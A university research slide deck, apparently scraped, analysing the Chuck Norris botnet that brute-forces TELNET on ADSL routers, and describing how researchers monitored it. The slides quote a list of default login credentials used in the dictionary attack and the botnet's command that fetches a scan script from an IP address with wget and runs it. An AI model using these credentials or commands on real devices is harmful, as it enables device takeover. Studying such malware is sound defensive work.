embedded malware an analysis of the chuck norris botnet
play

Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, - PowerPoint PPT Presentation

Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, R. Krej, J. Vykopal, M. Draar {celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz The sixth European Conference on Computer Network Defense EC2ND


  1. Embedded Malware – An Analysis of the Chuck Norris Botnet P. Čeleda, R. Krejčí, J. Vykopal, M. Drašar {celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz The sixth European Conference on Computer Network Defense – EC2ND 28-29 October 2010, Berlin, Germany

  2. Part I Botnet Discovery P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 2 / 22

  3. Motivation – What is happening in our network? LAN LAN LAN Internet LAN LAN P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22

  4. Motivation – What is happening in our network? LAN LAN LAN Internet Firewall LAN LAN P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22

  5. Motivation – What is happening in our network? LAN LAN LAN Internet Firewall LAN LAN AV protection P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22

  6. Motivation – What is happening in our network? LAN LAN But what is happening here? LAN Internet Firewall LAN LAN AV protection P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22

  7. (In)visible Embedded Malware Client-side anti-* protection is used and well known. Internet P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 4 / 22

  8. (In)visible Embedded Malware Client-side anti-* protection is used and well known. What could happen if we attack infrastructure ? Chuck Norris Botnet Attack Internet Internet P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 4 / 22

  9. Network Security Monitoring at Masaryk University FlowMon probe FlowMon probe FlowMon probe NetFlow data generation P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22

  10. Network Security Monitoring at Masaryk University FlowMon probe NetFlow v5/v9 FlowMon probe NetFlow collector FlowMon probe NetFlow data NetFlow data generation collection P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22

  11. Network Security Monitoring at Masaryk University FlowMon SPAM probe detection NetFlow worm/virus v5/v9 detection FlowMon probe NetFlow intrusion collector detection FlowMon probe NetFlow data NetFlow data NetFlow data generation collection analyses P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22

  12. Network Security Monitoring at Masaryk University http WWW FlowMon SPAM probe detection NetFlow worm/virus v5/v9 mail detection FlowMon mailbox probe NetFlow intrusion collector syslog detection FlowMon syslog probe server NetFlow data NetFlow data NetFlow data incident generation collection analyses reporting P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22

  13. Botnet Discovery Worldwide TELNET scan attempts. Mostly comming from ADSL connections. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 6 / 22

  14. Part II Chuck Norris Botnet P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 7 / 22

  15. Chuck Norris Botnet in a Nutshell Linux malware – IRC bots with central C&C servers. Attacks poorly-configured Linux MIPSEL devices. Vulnerable devices – ADSL modems and routers . Uses TELNET brute force attack as infection vector. Users are not aware about the malicious activities. Missing anti-malware solution to detect it. Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R]anger Killato : in nome di Chuck Norris ! P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 8 / 22

  16. Monitoring of the Botnet Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  17. Monitoring of the Botnet IRC server bad guy Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  18. Monitoring of the Botnet IRC server bad guy bots Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  19. Monitoring of the Botnet IRC server bad guy bots WAN port ASUS WL-500gP (agent-provocateur) Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  20. Monitoring of the Botnet IRC server bad guy bots TAP WAN port FlowMon, CSIRT-MU tcpdump ASUS WL-500gP (agent-provocateur) Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  21. Botnet Searching for Vulnerable Devices infected device P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22

  22. Botnet Searching for Vulnerable Devices list of C class networks to scan 85.174. 203.223. ... 217.236. 222.215. ... 88.253. ... infected device 201.1. 200.121. 58.6. ... 220.240. ... IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22

  23. Botnet Searching for Vulnerable Devices list of C class networks to scan pnscan 85.174. (port 23) 203.223. ... 217.236. 222.215. ... 88.253. ... infected device 201.1. 200.121. 58.6. ... 220.240. ... IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22

  24. Botnet Searching for Vulnerable Devices list of C class networks to scan pnscan 85.174. (port 23) 203.223. ... 217.236. 222.215. ... 88.253. ... infected device 201.1. 200.121. 58.6. ... 220.240. ... list of possible victims IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22

  25. Infection of a Vulnerable Device infected victim device P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22

  26. Infection of a Vulnerable Device TELNET service dictionary attack infected victim device User Password admin, Admin, password, root, 1234, private, XA1bac0MX, root adsl1234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password 1234 1234Admin Table 2: Passwords used for a dictionary attack. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22

  27. Infection of a Vulnerable Device TELNET service download current bot version dictionary attack infected victim web device server User Password admin, Admin, password, root, 1234, private, XA1bac0MX, root adsl1234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password 1234 1234Admin Table 2: Passwords used for a dictionary attack. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22

  28. Bot Initialization and Further Propagation bot STOP deny remote access (ports 22-80) infected device P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22

  29. Bot Initialization and Further Propagation 1. join ##soldiers## C&C bot (IRC) STOP deny remote access server (ports 22-80) infected device P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22

  30. Bot Initialization and Further Propagation 1. join ##soldiers## C&C bot (IRC) STOP deny remote access server 2. Topic: !* init-cmd (ports 22-80) (get scan-tools) infected device Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22

  31. Bot Initialization and Further Propagation 1. join ##soldiers## C&C bot (IRC) STOP deny remote access server 2. Topic: !* init-cmd (ports 22-80) (get scan-tools) infected device Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22

Recommend


More recommend